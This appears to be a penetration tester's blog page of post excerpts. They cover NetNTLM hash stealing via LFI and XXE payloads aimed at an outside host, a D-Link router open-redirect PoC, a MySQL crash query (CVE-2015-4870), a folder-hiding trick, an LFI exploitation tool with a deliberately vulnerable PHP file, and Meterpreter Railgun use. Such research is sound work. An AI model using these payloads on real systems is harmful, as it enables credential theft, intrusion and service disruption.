Places of Interest in Stealing NetNTLM Hashes

One day me and @m3g9tr0n was discussing different places where we can use responder in stealing NetNTLM hashes. After experimenting I thought of writing this post along with some cool findings in the world of Windows. SMBRelay attacks are also possible in these scenarios.

LFI

The include() in PHP will resolve the network path for us.

http://host.tld/?page=//11.22.33.44/@OsandaMalith

XXE

In here I’m using “php://filter/convert.base64-encode/resource=” that will resolve a network path.

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=//11.22.33.44/@OsandaMalith" >
]>
<root>
  <name></name>
  <tel></tel>
  <email>OUT&xxe;OUT</email>
  <password></password>
</root>


Continue reading

Advertisements

D-Link DIR-615 Open Redirection and XSS

D-Link DIR-615
Hardware Version: E3
Firmware Version: 5.10

The ‘apply.cgi’ file was vulnerable to Open Redirection and XSS. Inside the router many other cgi files too use this functionality in ‘apply.cgi’. For example the ‘ping_response.cgi’ file.

Open Redirection

apply.cgi

<html>
<!-- @OsandaMalith -->
  <body>
    <form action="http://192.168.0.1/apply.cgi" method="POST" id="exploit">
      <input type="hidden" name="html_response_page" value="https://google.lk" />
      <input type="hidden" name="html_response_return_page" value="tools_vct.asp" />
    <img src=x onerror="exploit.submit()"/>
    </form>
  </body>
</html>

Continue reading

My Journey into eCPPT

This course covers lots of areas in the field of penetration testing. I like the content since it covers good theory as well. They have included new sections such as Ruby and Wi-Fi. The content is very up to date. The exam was more realistic and not CTF based. I’m not going to write a complete review, but I would recommend this course for anyone who wants to enter the field of penetration testing or existing people. Always there’s something to new to learn from any course 😉

ecppt

MySQL DoS in the Procedure Analyse Function – CVE-2015-4870

This is a crash I found in MySQL versions up to 5.5.45. In the function procedure analyse() I found this crash while passing a sub query.

Syntax:

 
SELECT * FROM `table_name` PROCEDURE ANALYSE((SELECT*FROM(SELECT 1)x),1);

So an Example POC would be:

 
select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
 
---------------------------------------------------------------------------------------------------------------
mysql> select * from information_schema.tables procedure analyse((select*from(select 1)x),1);
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql>
mysql> select 1;
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
ERROR 2003 (HY000): Can't connect to MySQL server on 'localhost' (10061)
ERROR:
Can't connect to the server

mysql>
---------------------------------------------------------------------------------------------------------------


Continue reading

Magic Folder Hide

This is a application which I coded in last year but I have forgotten to make a blog post. Using this tool you can create a ‘..’ folder in Windows and store your data inside it. No one can access your files using the explorer since the path is not valid, they can only see the name 🙂

This trick can be used in pentesting and is widely used by malware for hiding other malicious files. I coded this tool just for fun 😀


Continue reading

LFi Freak – An Automated File Inclusion Exploiter

I am sure you know about exploiting file inclusion vulnerabilities. In file inclusion situations in common we can read files arbitrarily in the system or remotely depending on the permissions. In PHP environments commonly we poison the log files or inject malicious PHP into the user agent header and load the “/proc/self/environ” file. However when we encounter file inclusion situations in PHP environments we can use the in-built PHP wrappers to make our exploitations much easier or perhaps bypass existing filters.

There are lot of LFI exploitation tools available but I’ve written this tool mainly focusing on the usage of “php://input”, “php://filter” and “data://” methods.  Even though the title explicitly conveys “LFI Freak” this can be used for RFI vulnerabilities as well. This tool is written in Python 2.7 and I have included binaries for both Windows and Linux systems. If you are running from the source or want to modify this, you need the BeautifulSoup library.

Here is a small walkthrough of the features of the tool.

To test for local or remote file inclusions you can use the option one “Automated testing”. I am using DVWA in here. To test this tool create a small vulnerable file.

<?php
	echo "File included: ".$_REQUEST["page"]."<br>";
	$file =  $_REQUEST["page"];
	include $file;
?>

Continue reading

Accessing the Windows API Directly

If you are into pentesting I am sure you might have heard about the IRB shell in the Metasploit framework. This will be a small post about accessing Windows API using Railgun. Using Railgun we can access different functions in DLLs during runtime in memory. We could also write our own DLLs and call them directly using Railgun. This technique is used in the Meterpreter scripts and post exploitation modules to access the API to perform automated tasks.
For demonstration I will be using a Windows 7 machine as the target and Kali as the attacker machine.
After owning the box in the meterpreter session type “irb” and from there we can start the interactive ruby shell. The “client” will be our meterpreter client. We can access common API calls like this. Suppose I want to get the system information.

client.sys.config.sysinfo

Get the user ID

client.sys.config.getuid

Continue reading